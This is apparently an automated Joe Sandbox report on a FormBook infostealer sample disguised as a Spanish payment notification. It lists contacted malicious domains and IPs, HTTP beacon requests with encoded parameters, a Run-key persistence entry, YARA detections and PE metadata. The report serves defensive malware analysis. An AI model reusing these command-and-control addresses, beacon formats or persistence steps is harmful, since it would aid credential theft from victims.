                                          http://www.jiyu-kobo.co.jp/qm(Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.founder.com.cn/cne-dioNotificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.commNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/~mQNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/MmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comsiefNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            192.0.78.25
                                            		theguiriguide.comUnited States
                                            		2635AUTOMATTICUStrue
                                            198.54.117.212
                                            		parkingpage.namecheap.comUnited States
                                            		22612NAMECHEAP-NETUSfalse
                                            104.195.7.239
                                            		www.librevillegabon.comUnited States
                                            		22552ESITEDUStrue

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:626150
                                            Start date and time: 13/05/202216:43:472022-05-13 16:43:47 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 11m 52s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:Notificaci#U00f3n de pago.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@6/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 22.1% (good quality ratio 19.8%)
                                            • Quality average: 70.8%
                                            • Quality standard deviation: 32.4%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Adjust boot time
                                            • Enable AMSI

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 40.125.122.176, 52.152.110.14, 20.223.24.244, 52.242.101.226
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            16:45:11API Interceptor1x Sleep call for process: Notificaci#U00f3n de pago.exe modified
                                            16:47:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run D8ILG6RHT8 C:\Program Files (x86)\Qmx6\xhl42jqfp00z.exe

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASNs

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Notificaci#U00f3n de pago.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1308
                                            Entropy (8bit):5.345811588615766
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                            MD5:EA78C102145ED608EF0E407B978AF339
                                            SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
                                            SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                            SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.9124952245387155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Notificaci#U00f3n de pago.exe
                                            File size:535552
                                            MD5:297e8b7f26a2eb1af366cac0202eca9a
                                            SHA1:4b3e36dcd7ea9785f93e43699e1224ad30626148
                                            SHA256:441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
                                            SHA512:bd53b63f91ecdc33e6dba2929dbe1039df08bc8a84950af9fb2b34fe803c3d61fc09c40ae8843d961e4107e6970690e2ff4d7436ff1d78b7e5aa0b4c87576942
                                            SSDEEP:12288:3GuFJoO8gHHV3PnS2l3wCGeoPzaHkkzXlWaVaGNtl7:rwyHHRS2tPweEkzXRVJ
                                            TLSH:4DB41256A267A933C14A9736CCD855CC5330CF06AC23DA4768E932CC2B73BC64E91B67
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.|b..............0.."..........^A... ...`....@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x48415e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x627CAF6D [Thu May 12 06:55:41 2022 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x841100x4b.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x5e0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x840c30x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x821640x82200False0.939192333093data7.92135270708IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x860000x5e00x600False0.429036458333data4.15748129845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x880000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x860a00x354data
                                            RT_MANIFEST0x863f40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2013
                                            Assembly Version0.0.1.0
                                            InternalNameFormatExcept.exe
                                            FileVersion0.0.1.0
                                            CompanyName
                                            LegalTrademarks
                                            Comments
                                            ProductNamePagedOptionsDialog
                                            ProductVersion0.0.1.0
                                            FileDescriptionPagedOptionsDialog
                                            OriginalFilenameFormatExcept.exe

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2022 16:46:41.088460922 CEST4976080192.168.2.3198.54.117.212
                                            May 13, 2022 16:46:41.261989117 CEST8049760198.54.117.212192.168.2.3
                                            May 13, 2022 16:46:41.264811039 CEST4976080192.168.2.3198.54.117.212
                                            May 13, 2022 16:46:41.271711111 CEST4976080192.168.2.3198.54.117.212
                                            May 13, 2022 16:46:41.445027113 CEST8049760198.54.117.212192.168.2.3
                                            May 13, 2022 16:46:41.445060015 CEST8049760198.54.117.212192.168.2.3
                                            May 13, 2022 16:46:46.520431042 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.539464951 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.539556980 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.539707899 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.556318998 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.708456039 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.708498001 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.708687067 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.964236975 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.980910063 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:57.439934969 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.627410889 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.627687931 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.630451918 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.818396091 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818476915 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818505049 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818530083 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818550110 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818682909 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.818797112 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:58.006299973 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:58.006746054 CEST4976480192.168.2.3104.195.7.239

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2022 16:46:41.058917999 CEST5380253192.168.2.38.8.8.8
                                            May 13, 2022 16:46:41.080055952 CEST53538028.8.8.8192.168.2.3
                                            May 13, 2022 16:46:46.489698887 CEST6526653192.168.2.38.8.8.8
                                            May 13, 2022 16:46:46.515434027 CEST53652668.8.8.8192.168.2.3
                                            May 13, 2022 16:46:51.974284887 CEST6333253192.168.2.38.8.8.8
                                            May 13, 2022 16:46:52.015516996 CEST53633328.8.8.8192.168.2.3
                                            May 13, 2022 16:46:57.120481968 CEST6354853192.168.2.38.8.8.8
                                            May 13, 2022 16:46:57.438465118 CEST53635488.8.8.8192.168.2.3
                                            May 13, 2022 16:47:02.828375101 CEST4932753192.168.2.38.8.8.8
                                            May 13, 2022 16:47:02.958780050 CEST53493278.8.8.8192.168.2.3
                                            May 13, 2022 16:47:10.203502893 CEST6138053192.168.2.38.8.8.8
                                            May 13, 2022 16:47:10.370362997 CEST53613808.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 13, 2022 16:46:41.058917999 CEST192.168.2.38.8.8.80xfaa7Standard query (0)www.evertribute.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:46.489698887 CEST192.168.2.38.8.8.80x7032Standard query (0)www.theguiriguide.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:51.974284887 CEST192.168.2.38.8.8.80x6a9aStandard query (0)www.team-ctctitleco.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:57.120481968 CEST192.168.2.38.8.8.80x1c73Standard query (0)www.librevillegabon.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:47:02.828375101 CEST192.168.2.38.8.8.80xe13cStandard query (0)www.triptoasiam.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:47:10.203502893 CEST192.168.2.38.8.8.80x1b3Standard query (0)www.massage-rino.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)www.evertribute.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST8.8.8.8192.168.2.30x7032No error (0)www.theguiriguide.comtheguiriguide.comCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST8.8.8.8192.168.2.30x7032No error (0)theguiriguide.com192.0.78.25A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST8.8.8.8192.168.2.30x7032No error (0)theguiriguide.com192.0.78.24A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:52.015516996 CEST8.8.8.8192.168.2.30x6a9aName error (3)www.team-ctctitleco.comnonenoneA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:57.438465118 CEST8.8.8.8192.168.2.30x1c73No error (0)www.librevillegabon.com104.195.7.239A (IP address)IN (0x0001)
                                            May 13, 2022 16:47:02.958780050 CEST8.8.8.8192.168.2.30xe13cNo error (0)www.triptoasiam.com162.0.216.71A (IP address)IN (0x0001)
                                            May 13, 2022 16:47:10.370362997 CEST8.8.8.8192.168.2.30x1b3No error (0)www.massage-rino.com38.40.251.97A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.evertribute.com
                                            • www.theguiriguide.com
                                            • www.librevillegabon.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.349760198.54.117.21280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 13, 2022 16:46:41.271711111 CEST8613OUTGET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.evertribute.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.349761192.0.78.2580C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 13, 2022 16:46:46.539707899 CEST8614OUTGET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.theguiriguide.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 13, 2022 16:46:46.708456039 CEST8614INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Fri, 13 May 2022 14:46:46 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: close
                                            Location: https://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb
                                            X-ac: 2.hhn _dfw
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.349764104.195.7.23980C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 13, 2022 16:46:57.630451918 CEST9314OUTGET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.librevillegabon.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 13, 2022 16:46:57.818396091 CEST9314INHTTP/1.1 200 OK
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                            X-Powered-By: Nginx
                                            Date: Fri, 13 May 2022 14:46:58 GMT
                                            Connection: close
                                            Data Raw: 33 0d 0a ef bb bf 0d 0a
                                            Data Ascii: 3


                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:16:44:56
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xb90000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Target ID:8
                                            Start time:16:45:17
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Imagebase:0xe10000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
